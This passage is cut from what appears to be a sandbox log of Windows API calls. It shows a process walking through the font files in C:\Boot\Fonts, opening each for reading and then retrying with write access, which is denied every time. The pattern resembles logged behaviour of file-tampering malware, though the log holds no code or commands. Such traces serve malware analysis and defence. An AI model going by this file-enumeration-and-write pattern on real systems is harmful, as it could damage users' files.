Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0069.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.828] AreFileApisANSI () returned 1 [0069.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x536d0 [0069.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x536d0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 30 [0069.828] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.830] GetFileType (hFile=0x418) returned 0x1 [0069.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0069.830] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.830] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.830] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.830] CloseHandle (hObject=0x418) returned 1 [0069.830] AreFileApisANSI () returned 1 [0069.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0069.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 30 [0069.831] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.831] GetLastError () returned 0x5 [0069.831] GetLastError () returned 0x5 [0069.831] SetLastError (dwErrCode=0x5) [0069.831] GetLastError () returned 0x5 [0069.831] SetLastError (dwErrCode=0x5) [0069.831] GetLastError () returned 0x5 [0069.831] SetLastError (dwErrCode=0x5) [0069.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0069.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.831] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.831] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.831] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4bc156a, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef92a947, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x27a1b, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msjhn_boot.ttf", cAlternateFileName="MSJHN_~1.TTF")) returned 1 [0069.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0069.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0069.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0069.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0069.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0069.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0069.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0069.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0069.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0069.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.832] AreFileApisANSI () returned 1 [0069.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\msjhn_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\msjhn_boot.ttf", lpUsedDefaultChar=0x0) returned 29 [0069.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0069.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0069.832] AreFileApisANSI () returned 1 [0069.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0069.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3a) returned 0x534d8 [0069.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=29 | out: lpWideCharStr="C:\\Boot\\Fonts\\msjhn_boot.ttf") returned 29 [0069.833] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.833] GetFileType (hFile=0x418) returned 0x1 [0069.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.833] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.833] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.833] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.833] CloseHandle (hObject=0x418) returned 1 [0069.833] AreFileApisANSI () returned 1 [0069.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0069.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3a) returned 0x53298 [0069.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=29 | out: lpWideCharStr="C:\\Boot\\Fonts\\msjhn_boot.ttf") returned 29 [0069.834] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.834] GetLastError () returned 0x5 [0069.834] GetLastError () returned 0x5 [0069.834] SetLastError (dwErrCode=0x5) [0069.834] GetLastError () returned 0x5 [0069.834] SetLastError (dwErrCode=0x5) [0069.834] GetLastError () returned 0x5 [0069.834] SetLastError (dwErrCode=0x5) [0069.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0069.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0069.834] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.834] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.834] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef93ce3b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x281fb, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msjh_boot.ttf", cAlternateFileName="MSJH_B~1.TTF")) returned 1 [0069.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0069.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0069.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0069.834] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0069.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0069.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0069.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0069.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0069.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0069.835] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.835] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.835] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.835] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0069.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.835] AreFileApisANSI () returned 1 [0069.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\msjh_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\msjh_boot.ttf", lpUsedDefaultChar=0x0) returned 28 [0069.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.835] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.835] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0069.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0069.835] AreFileApisANSI () returned 1 [0069.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0069.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x782d0 [0069.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x782d0, cchWideChar=28 | out: lpWideCharStr="C:\\Boot\\Fonts\\msjh_boot.ttf") returned 28 [0069.835] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.837] GetFileType (hFile=0x418) returned 0x1 [0069.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x782d0 | out: hHeap=0x20000) returned 1 [0069.837] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.837] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.837] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.837] CloseHandle (hObject=0x418) returned 1 [0069.837] AreFileApisANSI () returned 1 [0069.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0069.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x38) returned 0x78010 [0069.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88770, cbMultiByte=-1, lpWideCharStr=0x78010, cchWideChar=28 | out: lpWideCharStr="C:\\Boot\\Fonts\\msjh_boot.ttf") returned 28 [0069.838] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.838] GetLastError () returned 0x5 [0069.838] GetLastError () returned 0x5 [0069.838] SetLastError (dwErrCode=0x5) [0069.838] GetLastError () returned 0x5 [0069.838] SetLastError (dwErrCode=0x5) [0069.838] GetLastError () returned 0x5 [0069.838] SetLastError (dwErrCode=0x5) [0069.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78010 | out: hHeap=0x20000) returned 1 [0069.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.838] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.838] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.838] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef94dfcd, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x25b3b, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msyhn_boot.ttf", cAlternateFileName="MSYHN_~1.TTF")) returned 1 [0069.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0069.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0069.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0069.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0069.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.838] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.838] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0069.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0069.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0069.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.839] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.839] AreFileApisANSI () returned 1 [0069.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Fonts\\msyhn_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Fonts\\msyhn_boot.ttf", lpUsedDefaultChar=0x0) returned 29 [0069.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.839] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0069.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0069.839] AreFileApisANSI () returned 1 [0069.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0069.839] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3a) returned 0x53838 [0069.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=29 | out: lpWideCharStr="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 29 [0069.839] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), 